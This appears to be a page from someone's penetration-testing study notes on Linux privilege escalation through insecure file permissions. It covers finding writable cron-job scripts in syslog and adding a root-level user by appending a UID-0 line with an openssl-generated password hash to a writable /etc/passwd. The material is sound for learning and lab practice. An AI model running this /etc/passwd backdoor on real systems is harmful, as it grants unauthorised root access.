TamaGorengs Notes
  • πŸ‘¨β€πŸ’»Whoami
  • πŸ—ΊοΈActive Directory
    • Active Directory Enumeration
    • AD Reconnaissance
      • LDAP
    • Movement
      • Kerberos
        • ASREProast
        • Pass The Hash
        • Pass The Ticket
        • Overpass The Hash
      • Credential
        • Dumping
          • DCSync
      • WMI and WinRM
  • πŸͺŸWindows
    • Windows Privilege Escalation
      • WinPrivEsc Enumeration
      • Leveraging Windows Services
      • Abusing Other Windows Components
    • RDP
  • 🐧Linux
    • Linux Privilege Escalation
      • LinuxPrivEsc Enumeration
      • Exposed Confidential Information
      • Insecure File Permissions
      • Insecure System Components
  • πŸ•ΈοΈWeb Application
    • SQL Injection
  • Group 1
    • Client-Side Attacks
      • Windows Library Files
      • Exploiting Microsoft Office
Powered by GitBook
On this page
  • Abusing Cron Jobs
  • Abusing Password Authentication

Was this helpful?

  1. Linux
  2. Linux Privilege Escalation

Insecure File Permissions

Abusing Cron Jobs

look for executed cron jobs from log, and see if the file is writable

grep "CRON" /var/log/syslog

Abusing Password Authentication

if we can write /etc/passwd we can replace the password or create new one with root permission

openssl passwd w00t

echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
PreviousExposed Confidential InformationNextInsecure System Components

Last updated 2 months ago

Was this helpful?

🐧